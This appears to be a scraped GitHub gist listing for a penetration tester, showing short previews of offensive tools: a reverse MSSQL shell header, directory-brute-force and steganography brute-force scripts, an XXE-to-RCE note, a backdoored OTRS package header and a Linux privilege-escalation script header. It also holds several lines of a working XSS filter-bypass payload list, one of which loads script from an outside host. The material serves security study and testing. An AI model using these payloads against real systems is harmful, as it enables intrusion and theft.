🏠
Working from home

Fernandez, ReK2 ReK2Fernandez

View NeoMutt colorschemes
# for background in 16 color terminal, valid background colors include:
# base03, bg, black, any of the non brights
# style notes:
# when bg=235, that's a highlighted message
# normal bg=233
# basic colors ---------------------------------------------------------
# color normal brightyellow default
color error color196 color235 # message line error text
ReK2Fernandez / mandros.py
Created Jun 5, 2018 — forked from xassiz/mandros.py
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
View SuperGoBuster.sh
#!/bin/bash
set -eu
URL=$1
SECLIST="${HOME}/herramientas/diccionarios/SecLists/Discovery/Web_Content"
MIDDIR="/usr/share/dirbuster/directory-list-2.3-medium.txt"
declare -a FILES=("tomcat.txt" "nginx.txt" "apache.txt" "Top1000-RobotsDisallowed.txt" "ApacheTomcat.fuzz.txt" "sharepoint.txt" "iis.txt")
EXTENSIONS=("txt,php,doc,docx")
GOB="/bin/gobuster"
OUTPUT="${URL}-results"
View gist:1f6f4afc2de1006de4e56e6e9a7d4b20
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
View keybase.md

Keybase proof

I hereby claim:

  • I am rek2fernandez on github.
  • I am cfernandez (https://keybase.io/cfernandez) on keybase.
  • I have a public key ASDB2t5UcZyFOJ7JllgzK85TEJfktBx0ibpsCrPs6aacGQo

To claim this, I am signing this object:

ReK2Fernandez / StegBrute.rb
Last active Nov 22, 2017
Brute force steganography passwords
View StegBrute.rb
#!/bin/env ruby
# Hispgatos
# by ReK2, Fernandez Chris
# https://keybase.io/cfernandez
# Bruteforce password protected documents hidden inside images
# add your dictionary below to the dic variable
# of course you need to have installed steghide
require 'open3'
ReK2Fernandez / xxsfilterbypass.lst
Last active Nov 15, 2017 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

ReK2Fernandez / MyPackage.opm
Created Sep 27, 2017 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
View MyPackage.opm
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
ReK2Fernandez / LinuxPrivEsc.sh
Created Aug 24, 2017 — forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
View LinuxPrivEsc.sh
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'